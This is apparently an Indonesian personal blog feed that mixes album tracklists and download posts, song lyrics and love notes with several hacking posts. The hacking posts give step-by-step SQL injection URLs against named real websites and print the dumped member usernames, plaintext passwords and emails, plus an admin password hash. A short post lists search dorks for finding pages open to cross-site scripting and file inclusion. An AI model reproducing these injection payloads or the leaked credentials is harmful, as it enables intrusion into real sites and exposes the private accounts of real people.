Dygta – 5 Hati Untuk Cinta)

Dygta – 5 Hati Untuk Cinta)

01. Dygta – Pencarianku
02. Dygta – Cinta Sudah Terlambat
03. Dygta – Kembalilah
04. Dygta – Gelisah
05. Dygta – Jangan Dengar Mereka
06. Dygta – Untukmu
07. Dygta – Pelangi Terindah
08. Dygta – Hanya Kau Yang Bisa (Ft. Imel)
09. Dygta – Belum Terlambat
10. Dygta – Tentang Kita
11. Dygta – Menunggumu
12. Dygta – Bila Memang Harus Berakhir

Sedout aja :

01. Dygta – Pencarianku
02. Dygta – Cinta Sudah Terlambat
03. Dygta – Kembalilah
04. Dygta – Gelisah
05. Dygta – Jangan Dengar Mereka
06. Dygta – Untukmu
07. Dygta – Pelangi Terindah
08. Dygta – Hanya Kau Yang Bisa (Ft. Imel)
09. Dygta – Belum Terlambat
10. Dygta – Tentang Kita
11. Dygta – Menunggumu
12. Dygta – Bila Memang Harus Berakhir

Sql Injection di http://ccs.my

disini -> http://ccs.my/news.php?id=1561

test error :

http://ccs.my/news.php?id=1561′

yup ada error kita coba uji

: D

1. Memeriksa jumlah Field Tabel

ketemu disini :

http://ccs.my/news.php?id=1561+order+by+6–

ya karena di num 7 posisi udah false :p

2. Mengeluarkan nomor Field

ketemu disini :

http://ccs.my/news.php?id=null+union+all+select+1,2,3,4,5,6–

3. mengeluarkan informasi dari versi mysql, nama database dan nama user

http://ccs.my/news.php?id=-1561+union+all+select+1,2,concat_ws(0×2B,version(),database(),user()),4,5,6++from+information_schema.tables+where+table_schema=database()–

4. mengeluarkan nama-nama tabel

http://ccs.my/news.php?id=-1561+union+all+select+1,2,group_concat(table_name),4,5,6++from+information_schema.tables+where+table_schema=database()–

5. mengeluarkan nama field dari tabel yang menyimpan UserID dan Password pengguna

http://ccs.my/news.php?id=-1561+union+all+select+1,2,group_concat(column_name),4,5,6+from+information_schema.columns+where+table_name=0×6d656d626572

disini aku ambel dari member

6. mengeluarkan record-record dari tabel member

http://ccs.my/news.php?id=-1561+union+all+select+1,2,group_concat(username,0×3a,password,0×3a,email,0×3a,member),4,5,6+from+member+–

Bingo….

cwtan:213:cwtan@myccs.com:on,fkyoon:jk45gb:fkyoon@myccs.com:,xtremecom:hasegawa:klwong@lycos.com:0,kevinloh:nbv354:lohwm@varitronix.com.my:,jasonwong:vgb54n:eljkmw@pd.jaring.my:,jeffery_yeoh:sc8bq1:jeffery_yeoh@yahoo.com:0,gtlau:fv62bx:gtlau@myccs.com:0,johan:ndxm532:johan.knaepen@flits-its.be:0,mohamed:hdx43n:mohamedabdulla@msn.com:0,johnathan:jsch82d:tong_hai@hotmail.com:0,jamesgoh:s45xh2:James_Goh@maxis.net.my:0,sean:dsc23:sean@pdaexpert.info:0,phchan:ph118:poh_hoon_chan@dell.com:,pccmy:suc51f:info@pccmy.com:0,ckphuah:s45f8:ckphuah@hotmail.com:0,cg-computers:hdxe45:licg@cgcomputers.com:0,armen:h2dz52:evergreen_holidays@usa.com:,matthew:sc25×3:easycam@pd.jaring.my:0,kyzee:ds5jk7:acheronz@hotmail.com:,george:dh9n2m:georgechang79@yahoo.com:0,wooijin:wooijin:wooijin@yahoo.com:,raymond-liew:sf28b:raymond@parade-asiapac.com:0,andrewgark:sc19nv:andrewgark@hotmail.com:0,jamil:sdc739:jamil@koptech.com.my:0,irene_tew:kxn349:mtc_irene03@yahoo.com:0,chenlung:xun329:clcher@yahoo.co.jp:0,ericlim:un39xv:ericlimlh@pd.jari

thanks to :

Nocki Aka Mad’on, Temen2 Di arabhack@dal.nyet, Mainhack Brotherhood&temen2 di indohackerlink@dal.nyet&all my friends

special to mami :* love u mam

XSS Dan LFI

Jam segini ngak bisa tidur pala pening Iseng2

nemu dork inurl:?root=

dork lama sich

nemu situs kena xss :

lihat disini

Juga Disini

Hajar Lagi

Sikat Lagi

Untuk Yang LFi

Dork : inurl:”index.php?include_file=”

Kena LFI :

1
2
3
4

Sql Injection website http://www.kpu-kotabogor.com

1. Test error

bedakan antara :

http://www.kpu-kotabogor.com/mod.php?mod=publisher&op=viewarticle&artid=13

dengan ditambahi ‘ dibelakang

http://www.kpu-kotabogor.com/mod.php?mod=publisher&op=viewarticle&artid=13′

ya ada error disini dan bisa kita inject

2. Memeriksa jumlah Field Tabel

http://www.kpu-kotabogor.com/mod.php?mod=publisher&op=viewarticle&artid=13+order+by+11–

3. Mengeluarkan nomor Field

http://www.kpu-kotabogor.com/mod.php?mod=publisher&op=viewarticle&artid=null+union+all+select+1,2,3,4,5,6,7,8,9,10,11–

4. mengeluarkan informasi dari versi mysql, nama database dan nama user

http://www.kpu-kotabogor.com/mod.php?mod=publisher&op=viewarticle&artid=-13+union+all+select+1,2,3,concat_ws(0×2B,version(),database(),user()),5,6,group_concat(table_name),8,9,10,11+from+information_schema.tables+where+table_schema=database()–

5. mengeluarkan nama-nama tabel

http://www.kpu-kotabogor.com/mod.php?mod=publisher&op=viewarticle&artid=-13+union+all+select+1,2,3,concat_ws(0×2B,version(),database(),user()),5,6,group_concat(table_name),8,9,10,11+from+information_schema.tables+where+table_schema=database()–

6. mengeluarkan nama field dari tabel yang menyimpan UserID dan Password pengguna

http://www.kpu-kotabogor.com/mod.php?mod=publisher&op=viewarticle&artid=-13+union+all+select+1,2,3,4,5,6,group_concat(column_name),8,9,10,11+from+information_schema.columns+where+table_name=0×617574686f7273

disini saya mengambil nama tabel authors

7. mengeluarkan record-record dari tabel authors

http://www.kpu-kotabogor.com/mod.php?mod=publisher&op=viewarticle&artid=-13+union+all+select+1,2,3,4,5,6,group_concat(aid,0×3a,name,0×3a,url,0×3a,email,0×3a,pwd,0×3a,counter),8,9,10,11+from+authors%20–

Bingo :

admin:Administrator:http://www.kpu-kotabogor.com:admin@kpu-kotabogor.com:204f9a8c36fe3eeffde4ed2a7b03f16b:99

Hajar Bleh..Tapi sayang page admin ngak bisa diakses..wkwkwkwkw

Thanks To All My Friend&Mainhack Brotherhood

Special To ya2nk Miss&Love U

Sql Injection website www.radarmadiun.co.id

Malam2&lagi kangen ma seseorang ada temen pv di ym kasih hasil sql-nya http://www.radarmadiun.co.id lalu aku iseng2 nyobain

site : http://www.radarmadiun.co.id

kita coba buka : http://www.radarmadiun.co.id/main.php?act=detail&catid=24&id=3351

1. Lakukan pengecekan dengan memasukkan karakter tanda petik satu single_quote (‘)

http://www.radarmadiun.co.id/main.php?act=detail&catid=24&id=3351′

Halaman akan menampilkan pesan error

2. Memeriksa jumlah field dari suatu tabel dengan +order+by+num

http://www.radarmadiun.co.id/main.php?act=detail&catid=24&id=335+order+by+1–

disini ditemukan pada nomor 10

http://www.radarmadiun.co.id/main.php?act=detail&catid=24&id=3351+order+by+10–

3. Mengeluarkan nomor field untuk menampilkan informasi dengan perintah UNION+ALL+SELECT+no_field+no_field+….

http://www.radarmadiun.co.id/main.php?act=detail&catid=24&id=-3351+union+all+select+1,2,3,4,5,6,7,8,9–

akan keluar angka-nya

4. kita akan keluarkan informasi dari versi mysql, nama database dan nama user

http://www.radarmadiun.co.id/main.php?act=detail&catid=24&id=-335+UNION+all+SELECT+1,2,3,4,5,concat_ws(0×2B,version(),database(),user()),7,8,9–

4. kita akan keluarkan nama-nama tabel

http://www.radarmadiun.co.id/main.php?act=detail&catid=24&id=-335+UNION+ALL+SELECT+1,2,3,4,5,group_concat(table_name),7,8,9+from+information_schema.tables+where+table_schema=database()–

5. Nama tabel telah kita ketahui, selanjutnya kita keluarkan nama field dari tabel yang menyimpan UserID dan Password pengguna.

http://www.radarmadiun.co.id/main.php?act=detail&catid=24&id=-335+UNION+ALL+SELECT+1,2,3,4,5,group_concat(column_name),7,8,9+from+information_schema.columns+where+table_name=0×636d735f7573657273–

disini aku ambil dari tabel cms_users

6. kita keluarkan record-record dari tabel cms_users

http://www.radarmadiun.co.id/main.php?act=detail&catid=24&id=-335+UNION+ALL+SELECT+1,2,3,4,5,group_concat(username,0×3a,password,0×3a,name,0×3a,email,0×3a,phone,0×3a,status,0×3a,createdby,0×3a,created,0×3a,updated,0×3a,lastlogin),7,8,9+from+cms_users+–

Hajr bleh  : D

ini hanyalah tulisan seorang newbie bila para master2 membaca mohon maaf bila ada salah maklum newbie habis )

Thanks to all my friend

Special to my honey itu tu yang ada di pic wa

http://www.radarmadiun.co.id/main.php?act=detail&catid=24&id=-335+UNION+ALL+SELECT+1,2,3,4,5,group_concat(table_name),7,8,9+from+information_schema.tables+where+table_schema=database()–

Letto – Lethologica (2009)

Letto – Lethologica (2009)

Track list:

01. Lubang Di Hati
02. Senyumanmu
03. Kepada Hati Itu
04. Lethologica
05. Itu Lagi Itu Lagi
06. Layang Layang
07. Ku Tak Percaya
08. Bird Song
09. Putih
10. Jalan Yang Hilang
11. Hapuskan Keluhanmu
12. Almost

Sedout aja :

01. Lubang Di Hati
02. Senyumanmu
03. Kepada Hati Itu
04. Lethologica
05. Itu Lagi Itu Lagi
06. Layang Layang
07. Ku Tak Percaya
08. Bird Song
09. Putih
10. Jalan Yang Hilang
11. Hapuskan Keluhanmu
12. Almost

The Rain – Perjalanan Tak Tergantikan

The Rain – Perjalanan Tak Tergantikan

Track List:
01 – Warna Hidup
02 – Boleh Saja Benci
03 – Meninggalkan Cerita Ini
04 – Apakah Kau Merasa
05 – Dengan Sederhana
06 – Percaya
07 – Psychedelic Rain
08 – Untuk Sahabatmu
09 – Tak Sempurna
10 – Perjalanan Tak Tergantikan

Sedout aja :

01 – Warna Hidup
02 – Boleh Saja Benci
03 – Meninggalkan Cerita Ini
04 – Apakah Kau Merasa
05 – Dengan Sederhana
06 – Percaya
07 – Psychedelic Rain
08 – Untuk Sahabatmu
09 – Tak Sempurna
10 – Perjalanan Tak Tergantikan

senyumanmu

indah matamu

derai rambutmu

menunjukkan sebuah keindahan

kutemukan arti kerinduan

dan kumengerti yang kucari

bukanlah cantikmu yang kucari

bukanlah itu yang aku nanti

tetapi ketulusan hati yang abadi

kutau mawar tak seindah dirimu

awan tak seteduh tatapanmu

tetapi kautau yang kutunggu

hanyalah senyummu..

kepada hati itu

aku terlena

dimana kau berada

aku terbawa

kepada hati itu

ku akan terus mencoba

by : letto

untuk orang yang kusayangi

miss u yank

Ungu – Penguasa Hati

Ungu – Penguasa Hati

Track List:
01. Akulah Cintamu
02. Dilema Cinta
03. Hampa Hatiku
04. Ku Ingin Selamanya
05. Beri Aku Waktu
06. Kau Tahu
07. Indonesiaku
08. Yang Pertama
09. Luka Disini
10. Terang Dalam Gelapku
11. Badai Kini Berlalu
12. Penguasa Waktu

Sedout aja :

01._Ungu_-_Akulah_Cintamu

02._Ungu_-_Dilema_Cinta

03._Ungu_-_Hampa_Hatiku

04. Ku Ingin Selamanya
05. Beri Aku Waktu
06. Kau Tahu
07. Indonesiaku
08. Yang Pertama
09. Luka Disini
10. Terang Dalam Gelapku
11. Badai Kini Berlalu
12. Penguasa Waktu

day 2

hari ini

berat tuk kulalui

setiap detik dan menit yang terlewatkan

kuselalu merindukan dirimu

dulu aku pernah baca sebuah kalimat

aku kira kalimat itu salah

tapi ternyata aku yang salah

“kita tidak akan pernah tau

seberapa besar rasa sayang

dan cinta kita kepada seseorang

sebelum kita

berpisah dengannya”

met bo2 ya yank have nice dream

miss&love u always in my heart